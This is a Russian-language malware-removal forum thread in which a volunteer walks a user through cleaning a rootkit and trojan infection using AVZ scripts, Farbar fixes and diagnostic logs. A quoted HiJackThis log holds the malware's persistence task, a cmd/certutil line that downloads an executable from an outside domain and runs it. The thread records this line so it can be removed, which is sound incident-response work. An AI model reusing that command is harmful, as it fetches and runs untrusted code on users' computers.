Не могу установить антивирус

[JhonV 0]

Здравствуйте!

Сегодня браузер на ноутбуке сам начал открывать разные сайты с рекламой. После отключения от интернета повышалась нагрузка системы до 100%. Запустил KVRT, он обнаружил троян и руткиты на скриншоте ниже. Лечение/удаление не помогло. Пробовал запускать TDSSKiller он нашел подозрительные службы Winmon.sys и WinmonFS.sys После перезагрузки они остались. Также не могу установить Касперский антивирус. Клиент догружает антивирус и выпадает ошибка.

 

[JhonV 0]

Забыл про лог.

CollectionLog-2021.01.16-02.00.zip

 

Извиняюсь, прошлый лог из под безопасного режима.

CollectionLog-2021.01.16-02.22.zip

[thyrex 1 219]

Выполните скрипт в AVZ из папки Autologger

begin
ShowMessage('Внимание! Перед выполнением скрипта AVZ автоматически закроет все сетевые подключения.' + #13#10 + 'После перезагрузки компьютера подключения к сети будут восстановлены в автоматическом режиме.');
ExecuteFile('net.exe', 'stop tcpip /y', 0, 15000, true);
if not IsWOW64
 then
  begin
   SearchRootkit(true, true);
   SetAVZGuardStatus(True);
  end;
 TerminateProcessByName('c:\users\admin\appdata\local\temp\csrss\ww30.exe');
 TerminateProcessByName('c:\users\admin\appdata\local\temp\csrss\u20200626.exe');
 TerminateProcessByName('c:\users\admin\appdata\local\temp\csrss\ml20201210.exe');
 TerminateProcessByName('c:\windows\rss\csrss.exe');
 SetServiceStart('WinmonProcessMonitor', 4);
 SetServiceStart('WinmonFS', 4);
 SetServiceStart('Winmon', 4);
 QuarantineFileF('c:\users\admin\appdata\local\temp\csrss', '*.exe, *.dll, *.sys, *.bat, *.vbs, *.ps1, *.js*, *.tmp*', true, '', 0, 0);
 QuarantineFile('C:\Users\Admin\appdata\local\temp\csrss\wup\xarch\wup.exe','');
 QuarantineFile('C:\Users\Admin\appdata\local\temp\csrss\mg20201223-1.exe','');
 QuarantineFile('C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe','');
 QuarantineFile('C:\Windows\System32\drivers\WinmonFS.sys','');
 QuarantineFile('C:\Windows\System32\drivers\Winmon.sys','');
 QuarantineFile('C:\Windows\system32\ntkrnlmp.exe','');
 QuarantineFile('C:\Windows\System32\drivers\WinmonProcessMonitor.sys','');
 QuarantineFile('c:\users\admin\appdata\local\temp\csrss\ww30.exe','');
 QuarantineFile('c:\users\admin\appdata\local\temp\csrss\u20200626.exe','');
 QuarantineFile('c:\users\admin\appdata\local\temp\csrss\ml20201210.exe','');
 QuarantineFile('c:\windows\rss\csrss.exe','');
 DeleteFile('c:\windows\rss\csrss.exe','32');
 DeleteFile('c:\users\admin\appdata\local\temp\csrss\ml20201210.exe','32');
 DeleteFile('c:\users\admin\appdata\local\temp\csrss\u20200626.exe','32');
 DeleteFile('c:\users\admin\appdata\local\temp\csrss\ww30.exe','32');
 DeleteFile('C:\Windows\System32\drivers\WinmonProcessMonitor.sys','64');
 DeleteFile('C:\Windows\System32\drivers\Winmon.sys','64');
 DeleteFile('C:\Windows\System32\drivers\WinmonFS.sys','64');
 DeleteFile('C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe','64');
 DeleteFile('C:\Users\Admin\appdata\local\temp\csrss\mg20201223-1.exe','32');
 DeleteFile('C:\Users\Admin\appdata\local\temp\csrss\wup\xarch\wup.exe','32');
 DeleteService('WinmonProcessMonitor');
 DeleteService('WinmonFS');
 DeleteService('Winmon');
 RegKeyDel('HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\WhiteHaze','x64');
 DeleteSchedulerTask('csrss');
 DeleteSchedulerTask('ScheduledUpdate');
BC_ImportAll;
ExecuteSysClean;
BC_Activate;
RebootWindows(false);
end.

• Обратите внимание: будет выполнена перезагрузка компьютера.

Выполните скрипт в AVZ

begin
CreateQurantineArchive('c:\quarantine.zip');
end.

c:\quarantine.zip загрузите по ссылке https://virusinfo.info/upload_virus.php?tid=37678

Полученный после загрузки ответ сообщите здесь.

 

Пофиксите в HiJackThis из папки Autologger (некоторых записей может не быть)

O21 - HKLM\..\ShellIconOverlayIdentifiers\00asw: (no name) - {472083B0-C522-11CF-8763-00608CC02F24} - (no file)
O22 - Task: (disabled) \Microsoft\Windows\Media Center\PeriodicScanRetry - C:\Windows\ehome\MCUpdate.exe -pscn 0 (file missing)
O22 - Task: (disabled) \Microsoft\Windows\Media Center\RecordingRestart - C:\Windows\ehome\ehrec /RestartRecording (file missing)
O22 - Task: IUM-F1E24CA0-B63E-4F13-A9E3-4ADE3BFF3473 - C:\Program Files (x86)\Intel\Intel(R) Update Manager\bin\iumsvc.exe --automatic (file missing)
O22 - Task: ScheduledUpdate - C:\Windows\system32\cmd.exe /C certutil.exe -urlcache -split -f https://fotamene.com/app/app.exe C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe /31340
O22 - Task: \Avast Software\Overseer - C:\Program Files\Common Files\AVAST Software\Overseer\overseer.exe /from_scheduler:1
O22 - Task: \Microsoft\Windows\Media Center\ActivateWindowsSearch - C:\Windows\ehome\ehPrivJob.exe /DoActivateWindowsSearch (file missing)
O22 - Task: \Microsoft\Windows\Media Center\ConfigureInternetTimeService - C:\Windows\ehome\ehPrivJob.exe /DoConfigureInternetTimeService (file missing)
O22 - Task: \Microsoft\Windows\Media Center\DispatchRecoveryTasks - C:\Windows\ehome\ehPrivJob.exe /DoRecoveryTasks $(Arg0) (file missing)
O22 - Task: \Microsoft\Windows\Media Center\InstallPlayReady - C:\Windows\ehome\ehPrivJob.exe /InstallPlayReady $(Arg0) (file missing)
O22 - Task: \Microsoft\Windows\Media Center\MediaCenterRecoveryTask - C:\Windows\ehome\mcupdate.exe -MediaCenterRecoveryTask (file missing)
O22 - Task: \Microsoft\Windows\Media Center\OCURActivate - C:\Windows\ehome\ehPrivJob.exe /OCURActivate (file missing)
O22 - Task: \Microsoft\Windows\Media Center\OCURDiscovery - C:\Windows\ehome\ehPrivJob.exe /OCURDiscovery $(Arg0) (file missing)
O22 - Task: \Microsoft\Windows\Media Center\ObjectStoreRecoveryTask - C:\Windows\ehome\mcupdate.exe -ObjectStoreRecoveryTask (file missing)
O22 - Task: \Microsoft\Windows\Media Center\PBDADiscovery - C:\Windows\ehome\ehPrivJob.exe /PBDADiscovery (file missing)
O22 - Task: \Microsoft\Windows\Media Center\PBDADiscoveryW1 - C:\Windows\ehome\ehPrivJob.exe /wait:7 /PBDADiscovery (file missing)
O22 - Task: \Microsoft\Windows\Media Center\PBDADiscoveryW2 - C:\Windows\ehome\ehPrivJob.exe /wait:90 /PBDADiscovery (file missing)
O22 - Task: \Microsoft\Windows\Media Center\PvrRecoveryTask - C:\Windows\ehome\mcupdate.exe -PvrRecoveryTask (file missing)
O22 - Task: \Microsoft\Windows\Media Center\PvrScheduleTask - C:\Windows\ehome\mcupdate.exe -PvrSchedule (file missing)
O22 - Task: \Microsoft\Windows\Media Center\RegisterSearch - C:\Windows\ehome\ehPrivJob.exe /DoRegisterSearch $(Arg0) (file missing)
O22 - Task: \Microsoft\Windows\Media Center\ReindexSearchRoot - C:\Windows\ehome\ehPrivJob.exe /DoReindexSearchRoot (file missing)
O22 - Task: \Microsoft\Windows\Media Center\SqlLiteRecoveryTask - C:\Windows\ehome\mcupdate.exe -SqlLiteRecoveryTask (file missing)
O22 - Task: \Microsoft\Windows\Media Center\UpdateRecordPath - C:\Windows\ehome\ehPrivJob.exe /DoUpdateRecordPath $(Arg0) (file missing)
O22 - Task: \Microsoft\Windows\Media Center\ehDRMInit - C:\Windows\ehome\ehPrivJob.exe /DRMInit (file missing)
O22 - Task: \Microsoft\Windows\Media Center\mcupdate - C:\Windows\ehome\mcupdate $(Arg0) (file missing)
O22 - Task: \Microsoft\Windows\Windows Media Sharing\UpdateLibrary - C:\Program Files\Windows Media Player\wmpnscfg.exe (file missing)
O22 - Task: csrss - C:\Windows\rss\csrss.exe

 

Пожалуйста, ЕЩЕ РАЗ запустите Autologger; прикрепите к следующему сообщению НОВЫЕ логи.

 

[JhonV 0]

Сделал.
210116_104937_quarantine_6002c4c1576dc.zip
Размер файла    13507559
MD5    911c4ef7a023a10a054364a1d0be41ab

CollectionLog-2021.01.16-13.03.zip

[thyrex 1 219]

Скачайте Farbar Recovery Scan Tool и сохраните на Рабочем столе.

• Примечание: необходимо выбрать версию, совместимую с Вашей операционной системой. Если Вы не уверены, какая версия подойдет для Вашей системы, скачайте обе и попробуйте запустить. Только одна из них запустится на Вашей системе.

1. Запустите программу двойным щелчком. Когда программа запустится, нажмите Yes для соглашения с предупреждением.
2. Убедитесь, что в окне Optional Scan отмечены List BCD и 90 Days Files.

3. Нажмите кнопку Scan.
4. После окончания сканирования будет создан отчет (FRST.txt) в той же папке, откуда была запущена программа.
5. Если программа была запущена в первый раз, также будет создан отчет (Addition.txt).
6. Файлы FRST.txt и Addition.txt заархивируйте (в один общий архив) и прикрепите к сообщению.
 

[JhonV 0]

Addition+FRST.rar

[thyrex 1 219]

1. Выделите следующий код:

Start::
CreateRestorePoint:
Task: {83F3B6AE-E622-4256-936F-60DB0C8EAF0E} - \Microsoft\Windows\Windows Error Reporting\SysInfo -> No File <==== ATTENTION
HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Restriction <==== ATTENTION
HKU\S-1-5-21-2418884824-3860961792-1115039913-1000\...\MountPoints2: E - E:\setup.exe
HKU\S-1-5-21-2418884824-3860961792-1115039913-1000\...\MountPoints2: {2bfae82e-d483-11e5-92eb-201a06d087ae} - E:\_DS.exe
HKU\S-1-5-21-2418884824-3860961792-1115039913-1000\...\MountPoints2: {901366d3-ef40-11e5-b30f-201a06d087ae} - F:\autorun.exe
2021-01-15 17:47 - 2021-01-16 12:42 - 000000000 ___HD C:\Windows\rss
ContextMenuHandlers4: [Kaspersky Anti-Virus 21.2] -> {9B9F6E01-A5CF-4269-B245-CFF66A7DAEBD} => C:\Program Files (x86)\Kaspersky Lab\Kaspersky Security Cloud 21.2\x64\shellex.dll -> No File
ContextMenuHandlers5: [igfxcui] -> {3AB1675A-CCFF-11D2-8B20-00A0C93CB1F4} =>  -> No File
ContextMenuHandlers2: [Kaspersky Anti-Virus 21.2] -> {9B9F6E01-A5CF-4269-B245-CFF66A7DAEBD} => C:\Program Files (x86)\Kaspersky Lab\Kaspersky Security Cloud 21.2\x64\shellex.dll -> No File
ContextMenuHandlers1: [Kaspersky Anti-Virus 21.2] -> {9B9F6E01-A5CF-4269-B245-CFF66A7DAEBD} => C:\Program Files (x86)\Kaspersky Lab\Kaspersky Security Cloud 21.2\x64\shellex.dll -> No File
ContextMenuHandlers6: [Kaspersky Anti-Virus 21.2] -> {9B9F6E01-A5CF-4269-B245-CFF66A7DAEBD} => C:\Program Files (x86)\Kaspersky Lab\Kaspersky Security Cloud 21.2\x64\shellex.dll -> No File
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\12356847.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\13174329.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\13972774.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\16406081.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\17677940.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\20987513.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\34185775.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\35837618.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\46729803.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\48929350.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\50036160.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\58019458.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\5BDE740C6.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\67291239.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\78716586.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\12356847.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\13174329.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\13972774.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\16406081.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\17677940.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\20987513.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\34185775.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\35837618.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\46729803.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\48929350.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\50036160.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\58019458.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\5BDE740C6.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\67291239.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\78716586.sys => ""="Driver"
FirewallRules: [TCP Query User{BD854EAF-D286-4D16-850B-FB9055A0BC2E}C:\games\byond\bin\byond.exe] => (Block) C:\games\byond\bin\byond.exe => No File
FirewallRules: [UDP Query User{71F1D39A-3E94-40F6-B52C-B262B608345C}C:\games\byond\bin\byond.exe] => (Block) C:\games\byond\bin\byond.exe => No File
FirewallRules: [TCP Query User{396E02A1-4D2F-4CBA-AEC4-0CD4A1B8F4CD}C:\games\byond\bin\dreamdaemon.exe] => (Allow) C:\games\byond\bin\dreamdaemon.exe => No File
FirewallRules: [UDP Query User{D0699108-179E-4EDC-AD3D-5A1E66B31205}C:\games\byond\bin\dreamdaemon.exe] => (Allow) C:\games\byond\bin\dreamdaemon.exe => No File
FirewallRules: [{EFF34056-8F5A-4D41-B63D-597865E938FD}] => (Block) LPort=135
FirewallRules: [{F1F060F4-72C2-4606-AF01-D4B85CEBEF67}] => (Block) LPort=445
FirewallRules: [{459885CF-8E5D-4079-8E87-DFF8B87AE910}] => (Block) LPort=135
FirewallRules: [{B28868C3-2B55-4AF6-9215-E72CBA89041F}] => (Block) LPort=137
FirewallRules: [{993D7192-D777-4303-AC40-BB1F17CAAA27}] => (Block) LPort=138
FirewallRules: [{CC3FDB35-176A-403C-B43C-ED84557E5A7B}] => (Block) LPort=139
FirewallRules: [{2A70265C-0985-4381-B0A8-2EDA246BD91E}] => (Block) LPort=445
File: C:\Windows\system32\ntkrnlmp.exe
File: C:\Windows\system32\osloader.exe
ExportKey: HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions
Reboot:
End::

2. Скопируйте выделенный текст (правая кнопка мыши – Копировать).
3. Запустите Farbar Recovery Scan Tool.
4. Нажмите один раз на кнопку Fix и подождите. Программа создаст лог-файл (Fixlog.txt). Пожалуйста, прикрепите его в следующем сообщении.

 

• Обратите внимание: будет выполнена перезагрузка компьютера.

[JhonV 0]

Сделал.

Fixlog.txt

[thyrex 1 219]

Выполните скрипт в AVZ из папки Autologger

begin
RegKeyDel('HKLM', 'SOFTWARE\Microsoft\Windows Defender\Exclusions');
RebootWindows(false);
end.

• Обратите внимание: будет выполнена перезагрузка компьютера.

 

+ Загрузите SecurityCheck by glax24 & Severnyj и сохраните утилиту на Рабочем столе.

• Запустите двойным щелчком мыши (если Вы используете Windows XP) или из меню по щелчку правой кнопки мыши Запустить от имени администратора (если Вы используете Windows Vista/7/8/10);
• Если увидите предупреждение от вашего фаервола относительно программы SecurityCheck, не блокируйте ее работу;
• Дождитесь окончания сканирования, откроется лог в Блокноте с именем SecurityCheck.txt;
• Если Вы закрыли Блокнот, то найти этот файл можно в корне системного диска в папке с именем SecurityCheck, например C:\SecurityCheck\SecurityCheck.txt;
• Процитируйте содержимое файла в своем следующем сообщении.

[JhonV 0]

Цитата

SecurityCheck by glax24 & Severnyj v.1.4.0.53 [27.10.17]
WebSite: www.safezone.cc
DateLog: 16.01.2021 17:30:29
Path starting: C:\Users\Admin\AppData\Local\Temp\SecurityCheck\SecurityCheck.exe
Log directory: C:\SecurityCheck\
IsAdmin: True
User: Admin
VersionXML: 8.46is-16.01.2021
___________________________________________________________________________

Windows 7(6.1.7601) Service Pack 1 (x64) Professional Lang: Russian(0419)
Дата установки ОС: 15.02.2016 19:56:34
Статус лицензии: Windows(R) 7, Professional edition Windows находится в режиме уведомления
Режим загрузки: Normal
Браузер по умолчанию: 0
Системный диск: ФС: [NTFS] Емкость: [465.7 Гб] Занято: [193.3 Гб] Свободно: [272.4 Гб]
------------------------------- [ Windows ] -------------------------------
Расширенная поддержка закончилась 14.01.2020, Ваша операционная система может быть уязвима к новым типам угроз
Internet Explorer 8.0.7601.17514 Внимание! Скачать обновления
^Используйте Средство устранения неполадок при проблемах установки^
Контроль учётных записей пользователя включен (Уровень 3)
Автоматическое обновление отключено
Центр обеспечения безопасности (wscsvc) - Служба остановлена
Удаленный реестр (RemoteRegistry) - Служба остановлена
Обнаружение SSDP (SSDPSRV) - Служба остановлена
Службы удаленных рабочих столов (TermService) - Служба остановлена
Служба удаленного управления Windows (WS-Management) (WinRM) - Служба остановлена
------------------------------- [ HotFix ] --------------------------------
HotFix KB3177467 Внимание! Скачать обновления
HotFix KB3125574 Внимание! Скачать обновления
HotFix KB4012212 Внимание! Скачать обновления
HotFix KB4499175 Внимание! Скачать обновления
HotFix KB4474419 Внимание! Скачать обновления
HotFix KB4490628 Внимание! Скачать обновления
HotFix KB4539602 Внимание! Скачать обновления
------------------------------ [ MS Office ] ------------------------------
Microsoft Office 2007 v.12.0.6612.1000
--------------------------- [ FirewallWindows ] ---------------------------
Брандмауэр Windows (MpsSvc) - Служба работает
---------------------- [ AntiVirusFirewallInstall ] -----------------------
FortiClient v.4.3.3.0445
--------------------------- [ OtherUtilities ] ----------------------------
Git version 2.8.1 v.2.8.1 Внимание! Скачать обновления
Microsoft .NET Framework 4.7.2 v.4.7.03062 Внимание! Скачать обновления
Node.js v.8.11.3 Внимание! Скачать обновления
^Если Вам нужна LTS версия, проверьте обновления на странице скачивания вручную.^
Microsoft Office Стандартный 2007 v.12.0.6612.1000 Данная программа больше не поддерживается разработчиком. Обновите Microsoft Office до последней версии или используйте Office Online или LibreOffice
Steam v.2.10.91.91
Wireshark 3.0.4 32-bit v.3.0.4 Внимание! Скачать обновления
Microsoft Office Standard 2007 v.12.0.6612.1000 Данная программа больше не поддерживается разработчиком. Обновите Microsoft Office до последней версии или используйте Office Online или LibreOffice
Microsoft Office 2007 Service Pack 3 (SP3) Данная программа больше не поддерживается разработчиком. Обновите Microsoft Office до последней версии или используйте Office Online или LibreOffice
Epic Games Launcher v.1.1.298.0
Intel® Driver & Support Assistant v.3.7.0.6 Внимание! Скачать обновления
------------------------------ [ ArchAndFM ] ------------------------------
WinRAR 5.20 (64-разрядная) v.5.20.0 Внимание! Скачать обновления
------------------------------- [ Imaging ] -------------------------------
paint.net v.4.0.9 Внимание! Скачать обновления
-------------------------- [ IMAndCollaborate ] ---------------------------
Skype™ 7.18 v.7.18.112 Внимание! Скачать обновления
--------------------------------- [ P2P ] ---------------------------------
BitTorrent v.7.10.5.45665 Внимание! Клиент сети P2P с рекламным модулем!.
µTorrent v.3.5.5.45672 Внимание! Клиент сети P2P с рекламным модулем!.
uTorrent Web v.1.1.0 Внимание! Клиент сети P2P с рекламным модулем!.
-------------------------------- [ Java ] ---------------------------------
Java 8 Update 221 (64-bit) v.8.0.2210.11 Внимание! Скачать обновления
^Удалите старую версию и установите новую (jre-8u271-windows-x64.exe)^
Java SE Development Kit 8 Update 112 (64-bit) v.8.0.1120.15 Данная программа больше не поддерживается разработчиком. Рекомендуется деинсталлировать ее, скачать и установить Java SE Development Kit (jdk-15.0.1_windows-x64_bin.exe).
Java SE Development Kit 8 Update 221 (64-bit) v.8.0.2210.11 Данная программа больше не поддерживается разработчиком. Рекомендуется деинсталлировать ее, скачать и установить Java SE Development Kit (jdk-15.0.1_windows-x64_bin.exe).
Java SE Development Kit 8 Update 74 (64-bit) v.8.0.740.2 Данная программа больше не поддерживается разработчиком. Рекомендуется деинсталлировать ее, скачать и установить Java SE Development Kit (jdk-15.0.1_windows-x64_bin.exe).
Java SE Development Kit 8 Update 92 (64-bit) v.8.0.920.14 Данная программа больше не поддерживается разработчиком. Рекомендуется деинсталлировать ее, скачать и установить Java SE Development Kit (jdk-15.0.1_windows-x64_bin.exe).
Java 8 Update 221 v.8.0.2210.11 Внимание! Скачать обновления
^Удалите старую версию и установите новую (jre-8u271-windows-i586.exe)^
------------------------------- [ Browser ] -------------------------------
Mozilla Firefox 61.0.2 (x64 en-US) v.61.0.2 Внимание! Скачать обновления
^Проверьте обновления через меню Справка - О Firefox!^
Opera Stable 73.0.3856.329 v.73.0.3856.329 Внимание! Скачать обновления
^Проверьте обновления через меню О программе!^
------------------ [ AntivirusFirewallProcessServices ] -------------------
Защитник Windows (WinDefend) - Служба остановлена
----------------------------- [ End of Log ] ------------------------------

 

 

Надеюсь сделал правильно.

[thyrex 1 219]

Антивирус установился?

 

Цитата

------------------------------- [ Windows ] -------------------------------
Расширенная поддержка закончилась 14.01.2020, Ваша операционная система может быть уязвима к новым типам угроз
Internet Explorer 8.0.7601.17514 Внимание! Скачать обновления
^Используйте Средство устранения неполадок при проблемах установки^
------------------------------- [ HotFix ] --------------------------------
HotFix KB3177467 Внимание! Скачать обновления
HotFix KB3125574 Внимание! Скачать обновления
HotFix KB4012212 Внимание! Скачать обновления
HotFix KB4499175 Внимание! Скачать обновления
HotFix KB4474419 Внимание! Скачать обновления
HotFix KB4490628 Внимание! Скачать обновления
HotFix KB4539602 Внимание! Скачать обновления
--------------------------- [ OtherUtilities ] ----------------------------
Git version 2.8.1 v.2.8.1 Внимание! Скачать обновления
Microsoft .NET Framework 4.7.2 v.4.7.03062 Внимание! Скачать обновления
Node.js v.8.11.3 Внимание! Скачать обновления
^Если Вам нужна LTS версия, проверьте обновления на странице скачивания вручную.^
Microsoft Office Стандартный 2007 v.12.0.6612.1000 Данная программа больше не поддерживается разработчиком. Обновите Microsoft Office до последней версии или используйте Office Online или LibreOffice
Wireshark 3.0.4 32-bit v.3.0.4 Внимание! Скачать обновления
Microsoft Office Standard 2007 v.12.0.6612.1000 Данная программа больше не поддерживается разработчиком. Обновите Microsoft Office до последней версии или используйте Office Online или LibreOffice
Microsoft Office 2007 Service Pack 3 (SP3) Данная программа больше не поддерживается разработчиком. Обновите Microsoft Office допоследней версии или используйте Office Online или LibreOffice
Intel® Driver & Support Assistant v.3.7.0.6 Внимание! Скачать обновления
------------------------------ [ ArchAndFM ] ------------------------------
WinRAR 5.20 (64-разрядная) v.5.20.0 Внимание! Скачать обновления
------------------------------- [ Imaging ] -------------------------------
paint.net v.4.0.9 Внимание! Скачать обновления
-------------------------- [ IMAndCollaborate ] ---------------------------
Skype™ 7.18 v.7.18.112 Внимание! Скачать обновления
-------------------------------- [ Java ] ---------------------------------
Java 8 Update 221 (64-bit) v.8.0.2210.11 Внимание! Скачать обновления
^Удалите старую версию и установите новую (jre-8u271-windows-x64.exe)^
Java SE Development Kit 8 Update 112 (64-bit) v.8.0.1120.15 Данная программа больше не поддерживается разработчиком. Рекомендуется деинсталлировать ее, скачать и установить Java SE Development Kit (jdk-15.0.1_windows-x64_bin.exe).
Java SE Development Kit 8 Update 221 (64-bit) v.8.0.2210.11 Данная программа больше не поддерживается разработчиком. Рекомендуется деинсталлировать ее, скачать и установить Java SE Development Kit (jdk-15.0.1_windows-x64_bin.exe).
Java SE Development Kit 8 Update 74 (64-bit) v.8.0.740.2 Данная программа больше не поддерживается разработчиком. Рекомендуется деинсталлировать ее, скачать и установить Java SE Development Kit (jdk-15.0.1_windows-x64_bin.exe).
Java SE Development Kit 8 Update 92 (64-bit) v.8.0.920.14 Данная программа больше не поддерживается разработчиком. Рекомендуется деинсталлировать ее, скачать и установить Java SE Development Kit (jdk-15.0.1_windows-x64_bin.exe).
Java 8 Update 221 v.8.0.2210.11 Внимание! Скачать обновления
^Удалите старую версию и установите новую (jre-8u271-windows-i586.exe)^
------------------------------- [ Browser ] -------------------------------
Mozilla Firefox 61.0.2 (x64 en-US) v.61.0.2 Внимание! Скачать обновления
^Проверьте обновления через меню Справка - О Firefox!^
Opera Stable 73.0.3856.329 v.73.0.3856.329 Внимание! Скачать обновления
^Проверьте обновления через меню О программе!^

установите рекомендуемые обновления.

[JhonV 0]

Установил пробную версию KIS. Обновил базы и запустил быструю проверку. Он нашел странный объект на скриншоте ниже. Запуск KVRT и TDSSKiller уже ничего не находят (победа?)

Пытался поставить HotFix KB4539602 выдает ошибку на скриншоте.

 

 

[thyrex 1 219]

1 час назад, JhonV сказал:

Он нашел странный объект на скриншоте ниже

Драйвер AVZ

 

1 час назад, JhonV сказал:

Пытался поставить HotFix KB4539602 выдает ошибку на скриншоте

Значит пропустите

[JhonV 0]

Обновил или удалил практически все кроме:

Internet Explorer 8.0.7601.17514

HotFix KB4539602 (и другие)

При попытке их обновления выпадет та ошибка отсутствия службы обновления Windows (0x80070424). Запускал "средство удаления неполадок при проблемах установки" на скриншоте, но не помогло и ошибка осталась. В службах отсутствует "центр обновления windows".

 

Но троянов уже вроде нет. Огромное спасибо!

 

 

 

[thyrex 1 219]

Да, совсем про эти сбитые настройки забыл.

 

Нужно экспортировать с системы идентичной Вашей ключи реестра

Цитата

 

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\wuauserv\

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\BITS\

 

в отдельные reg-файлы и импортировать их содержимое в реестр на Вашем компьютере.